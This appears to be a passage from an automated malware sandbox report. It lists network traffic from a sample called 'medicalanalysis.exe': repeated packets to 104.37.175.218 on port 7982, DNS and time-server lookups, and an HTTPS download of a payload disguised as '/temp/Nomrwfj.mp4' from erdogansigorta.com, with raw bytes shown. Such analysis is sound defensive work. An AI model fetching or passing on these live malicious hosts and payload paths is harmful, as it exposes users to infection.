                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.589848042 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.589867115 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.594810963 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.594873905 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.594907045 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.599843979 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.599914074 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.599980116 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.604870081 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.604934931 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.604954004 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.609811068 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.609882116 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.670918941 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.670939922 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.670989990 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.672637939 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.672691107 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.672733068 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.676346064 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.677653074 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.677705050 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.677728891 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.681205988 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.681252956 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.681292057 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.684746981 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.684804916 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.684842110 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.688375950 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.688431978 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.688436985 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.691809893 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.691869020 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.691972017 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.695121050 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.695177078 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.695178986 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.698553085 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.698569059 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.698599100 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.701724052 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.701785088 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.701802969 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.705085993 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.705111027 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.705127001 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.708106995 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.708161116 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.708203077 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.711394072 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.711410999 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.711443901 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.714432955 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.714483023 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.714582920 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.717587948 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.717641115 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.717680931 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.720642090 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.720689058 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.720726967 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.723658085 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.723711014 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.723759890 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.726684093 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.726739883 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.726866007 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.729717970 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.729763031 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.729846001 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.732595921 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.732666969 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.732698917 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.735517025 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.735619068 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.735640049 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.737377882 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.737440109 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.738135099 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.739301920 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.739362955 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.739547014 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.741178036 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.741233110 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.741250992 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.742990017 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.743042946 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.743146896 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.744872093 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.744935989 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.744944096 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.746726990 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.746778011 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.746819973 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.748644114 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.748697042 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.748717070 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.750498056 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.750551939 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.750715971 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.752393961 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.752450943 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.752526999 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.754211903 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.754242897 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.754265070 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.756108046 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.756181955 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.756212950 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.758126020 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.758188963 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.758230925 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.759833097 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.759892941 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.759918928 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.761754036 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.761780024 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.761810064 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.763612986 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.763676882 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.763715029 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.765526056 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.765552044 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.765598059 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.767291069 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.767348051 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.767390966 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.769180059 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.769231081 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.769258022 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.771086931 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.771145105 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.771188021 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.772934914 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.772989988 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.773030996 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.774785995 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.774837971 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.774852991 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.776679039 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.776751041 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.776792049 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.778525114 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.778577089 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.778621912 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.780411959 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.780462027 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.780473948 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.790535927 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.790595055 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.790643930 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.791526079 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.791573048 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.791656017 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.793343067 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.793395042 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.793396950 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.837676048 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.898196936 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:40.017796993 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:40.017860889 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:40.137336969 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:40.368067980 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:40.368160009 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:40.368218899 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:40.368218899 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:40.368304968 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:40.487799883 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:40.487818003 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:40.487823009 CET798249831104.37.175.218192.168.2.4

                                                                                                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:03.842467070 CET6490453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:04.103108883 CET53649041.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.560353041 CET5366353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.560528040 CET6236953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.560877085 CET6272453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.561130047 CET5452353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.563273907 CET5226253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.563503981 CET6323653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.697720051 CET53627241.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.698491096 CET53536631.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.702495098 CET53522621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.704097986 CET53632361.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.979571104 CET53623691.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.980293989 CET63237123192.168.2.4129.6.15.28
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.980340004 CET63237123192.168.2.4129.134.25.123
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.980444908 CET63237123192.168.2.4216.239.35.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.980479002 CET63237123192.168.2.4194.58.203.20
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.980529070 CET63237123192.168.2.4129.250.35.250
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:11.071111917 CET12363237129.250.35.250192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:11.071151018 CET12363237129.134.25.123192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:11.071181059 CET12363237129.6.15.28192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:11.076889038 CET12363237216.239.35.4192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:11.158015013 CET12363237194.58.203.20192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:21.658790112 CET53537771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:21.857805967 CET53529661.1.1.1192.168.2.4

                                                                                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:03.842467070 CET192.168.2.41.1.1.10x9e52Standard query (0)erdogansigorta.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.560353041 CET192.168.2.41.1.1.10xf21dStandard query (0)x.ns.gin.ntt.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.560528040 CET192.168.2.41.1.1.10x309eStandard query (0)gbg1.ntp.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.560877085 CET192.168.2.41.1.1.10x393fStandard query (0)time.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.561130047 CET192.168.2.41.1.1.10xf69Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.563273907 CET192.168.2.41.1.1.10xfae8Standard query (0)time.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.563503981 CET192.168.2.41.1.1.10x7708Standard query (0)time-a-g.nist.govA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:56:04.103108883 CET1.1.1.1192.168.2.40x9e52No error (0)erdogansigorta.com5.2.81.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.697720051 CET1.1.1.1192.168.2.40x393fNo error (0)time.google.com216.239.35.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.697720051 CET1.1.1.1192.168.2.40x393fNo error (0)time.google.com216.239.35.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.697720051 CET1.1.1.1192.168.2.40x393fNo error (0)time.google.com216.239.35.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.697720051 CET1.1.1.1192.168.2.40x393fNo error (0)time.google.com216.239.35.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.698491096 CET1.1.1.1192.168.2.40xf21dNo error (0)x.ns.gin.ntt.net129.250.35.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.698772907 CET1.1.1.1192.168.2.40xf69No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.702495098 CET1.1.1.1192.168.2.40xfae8No error (0)time.facebook.com129.134.25.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.704097986 CET1.1.1.1192.168.2.40x7708No error (0)time-a-g.nist.gov129.6.15.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.979571104 CET1.1.1.1192.168.2.40x309eNo error (0)gbg1.ntp.segbg1.ntp.netnod.seCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:09.979571104 CET1.1.1.1192.168.2.40x309eNo error (0)gbg1.ntp.netnod.se194.58.203.20A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                            • erdogansigorta.com

                                                                                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            0192.168.2.4497305.2.81.1264433756C:\Users\user\AppData\Local\Temp\IXP000.TMP\medicalanalysis.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-12-22 22:56:06 UTC84OUTGET /temp/Nomrwfj.mp4 HTTP/1.1
                                                                                                                                                                                                                                                                                                            Host: erdogansigorta.com
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            2024-12-22 22:56:06 UTC300INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Content-Type: video/mp4
                                                                                                                                                                                                                                                                                                            Last-Modified: Sun, 15 Dec 2024 12:38:32 GMT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            ETag: "2e747540ee4edb1:0"
                                                                                                                                                                                                                                                                                                            Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                            X-Powered-By-Plesk: PleskWin
                                                                                                                                                                                                                                                                                                            Date: Sun, 22 Dec 2024 22:56:05 GMT
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Content-Length: 1174536
                                                                                                                                                                                                                                                                                                            2024-12-22 22:56:06 UTC16084INData Raw: 87 61 cd 72 7a 4c a6 d8 2f 2c f4 91 1f e6 0c 7c 93 34 40 cc 1d 77 6d 95 4b ce 8a 8f 19 01 ad 8f 77 9e f5 7a 3b 8b f3 db 2d c0 f2 98 8f f4 db f1 5b e5 2c 92 cc 5e 50 46 ed 01 81 c7 f0 a7 31 b0 c9 a0 aa 58 04 ea ea eb 4b 83 78 d0 f6 a7 1a ad 43 49 93 fb 9b 99 18 1d da 01 7e 82 d2 c9 51 fb 10 51 44 18 e2 70 1f 4c 0e 46 0d e3 d4 9a 28 bd bf 25 4b 09 48 4b 87 a4 af 89 a9 db 97 1a 60 b5 60 07 2a 2c 5a ac 1d 9d 37 59 a2 32 1b 3f 40 64 a9 11 48 e0 69 c5 86 72 aa f5 c4 63 b2 c8 4a 92 7b 8c 9a 71 47 90 c2 58 b7 31 5f 7a 81 8d 96 94 12 fc 5d e1 79 59 a5 47 32 61 5d dd 65 e1 c4 c7 e9 0f 6b da 4d 13 2b 4e 68 08 dc fc 7b 49 fd bd 96 02 ba d7 7f 0e ea f7 ad 9d 58 39 08 77 dc 30 c5 3b 51 7d fc 5e b4 8d 2e 06 16 a6 e9 29 56 79 0e 41 5f 7a 30 84 0a 11 d0 1c 28 b9 f7 4c c7
